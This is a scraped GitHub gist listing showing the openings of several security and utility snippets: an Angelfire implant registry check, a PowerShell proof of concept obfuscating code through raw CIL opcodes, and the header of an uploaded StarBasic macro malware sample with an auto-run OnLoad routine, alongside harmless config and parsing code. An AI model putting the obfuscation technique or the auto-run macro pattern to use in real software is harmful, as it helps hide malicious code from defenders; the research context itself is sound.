Skip to content

Instantly share code, notes, and snippets.

Avatar
🎵
Listening to meowzek

Dan danzek

🎵
Listening to meowzek
86 followers · 212 following
View GitHub Profile
@dalmoz
dalmoz / CheckAngelfire.ps1
Last active September 3, 2017 08:33
A one-liner powershell script for testing if your station is infected by the CIA's Angelfire. Path known from: https://wikileaks.org/vault7/document/Angelfire-2_0-UserGuide/Angelfire-2_0-UserGuide.pdf
View CheckAngelfire.ps1
if ((Get-Item -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Windows').GetValue('SystemLookup')) {Write-Host "Angelfire found!"} else {Write-Host "Nothing"}
@jquinter
jquinter / config.yml
Last active April 15, 2018 12:29
Parse YAML from bash with sed and awk.
View config.yml
development:
adapter: mysql2
encoding: utf8
database: my_database
username: root
password:
apt:
- somepackage
- anotherpackage
@aronwoost
aronwoost / gist:1000402
Created May 31, 2011 12:11
Exclude private ip addresses from google analytics tracking
View gist:1000402
(function(){
var re = /(^127\.0\.0\.1)|(^10\.)|(^172\.1[6-9]\.)|(^172\.2[0-9]\.)|(^172\.3[0-1]\.)|(^192\.168\.)|localhost/;
if(re.test(window.location.hostname)) return;
var _gaq=[['_setAccount','UA-23156659-1'],['_trackPageview'],['_trackPageLoadTime']];
(function(d,t){var g=d.createElement(t),s=d.getElementsByTagName(t)[0];g.async=1;
g.src=('https:'==location.protocol?'//ssl':'//www')+'.google-analytics.com/ga.js';
s.parentNode.insertBefore(g,s)}(document,'script'));
})();
@msuhanov
msuhanov / print_ts_la.py
Created December 12, 2018 23:52
View print_ts_la.py
#!/usr/bin/env python3
import os
from time import sleep
FILE_PATH = 'ts.txt'
def get_atime_1():
result = os.stat(FILE_PATH, follow_symlinks = False)
return result.st_atime
@mattifestation
mattifestation / CILStreamObfuscation.ps1
Created March 1, 2018 20:18
View CILStreamObfuscation.ps1
${🤷} = New-Object Reflection.Emit.DynamicMethod('💩', [UInt32], @([UInt32], [UInt32]))
${🤔} = ${🤷}.GetILGenerator()
@(@(2, 275120805),@(3, 275120805),@(88, -261739867),@(42, 23440101)) | % {
${🤔}.Emit([Activator]::CreateInstance([System.Reflection.Emit.OpCode], [Reflection.BindingFlags] 'NonPublic, Instance', $null, @(($_[0] -as [System.Reflection.Emit.OpCode].Assembly.GetType('System.Reflection.Emit.OpCodeValues')), $_[1]), $null))
}
${💩} = ${🤷}.CreateDelegate([Func``3[UInt32, UInt32, UInt32]])
${💩}.Invoke(2,3)
@JohnLaTwC
JohnLaTwC / star basic macro malware.txt
Created February 7, 2019 17:22
StarBasic macro Malware (Uploaded by @JohnLaTwC)
View star basic macro malware.txt
## Uploaded by @JohnLaTwC
25b4214da1189fd30d3de7c538aa8b606f22c79e50444e5733fb1c6d23d71fbe.unzip\Basic\Standard\Module1.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE script:module PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "module.dtd">
<script:module xmlns:script="http://openoffice.org/2000/script" script:name="Module1" script:language="StarBasic">REM ***** BASIC *****
Sub OnLoad
Dim os as string
@sf-jonstewart
sf-jonstewart / prelease201902-shell_items.py
Last active February 21, 2019 01:35
Stroz Friedberg developer Shane McCulley rewrote our Python scripts for parsing Windows shell items using Kaitai. We'll contribute the definitions to Kaitai as open source. shell_items.py shows how to construct a parser on top of the Kaitai-generated parsers. This is an unsupported pre-release. Feedback welcome!
View prelease201902-shell_items.py
import datetime
from typing import AnyStr, Generator, Optional, Tuple, Type, Union
import uuid
from kaitaistruct import BytesIO, KaitaiStream
import known_uuids
import logging
import ShellItemList
@mattifestation
mattifestation / SimpleTCGLogParser.ps1
Last active April 14, 2019 01:43
If you have the HgsDiagnostics PowerShell module, then you can parse TCG logs.
View SimpleTCGLogParser.ps1
Import-Module HgsDiagnostics
$GetHgsTrace = Get-Command Get-HgsTrace
$RemoteAttestationCoreReference = $GetHgsTrace.ImplementingType.Assembly.GetReferencedAssemblies() | Where-Object { $_.Name -eq 'Microsoft.Windows.RemoteAttestation.Core' }
Add-Type -AssemblyName $RemoteAttestationCoreReference.FullName
$MostRecentTCGLog = Get-ChildItem C:\Windows\Logs\MeasuredBoot | Sort-Object -Property LastWriteTime -Descending | Select-Object -First 1 | Select-Object -ExpandProperty FullName
$LogBytes = [IO.File]::ReadAllBytes($MostRecentTCGLog)
$ParsedTCGLog = [Microsoft.Windows.RemoteAttestation.Core.TcgEventLog]::Parse($LogBytes)
$ParsedTCGLog.TcgData.Children | Sort-Object -Property PcrIndex | Group-Object -Property PcrIndex
@i80and
i80and / x8664-asm-cheetsheet.txt
Last active September 17, 2019 15:29
x86-64 asm cheatsheet
View x8664-asm-cheetsheet.txt
Registers
Caller-saved Callee-saved
RAX RCX RSP RDI RSI RDX R8 R9 R10 R11 RBP RBX R12 R13 R14 R15
Args: RDI, RSI, RDX, RCX, R8, R9, XMM0–7
Return: RAX
Simple Compile
yasm -f macho64 foo.asm && gcc foo.c foo.o -Wall -Wextra -g -O1
@timsutton
timsutton / apfs_cli_tools.txt
Last active February 7, 2020 23:06
apfs tools in Sierra
View apfs_cli_tools.txt
➜ ~ sw_vers
ProductName: Mac OS X
ProductVersion: 10.12.1
BuildVersion: 16B2333a
➜ ~ ls -l /System/Library/Filesystems/apfs.fs/Contents/Resources
total 2088
-rwxr-xr-x 1 root wheel 349760 22 Sep 03:48 apfs.util
-rwxr-xr-x 1 root wheel 352880 22 Sep 03:48 apfs_invert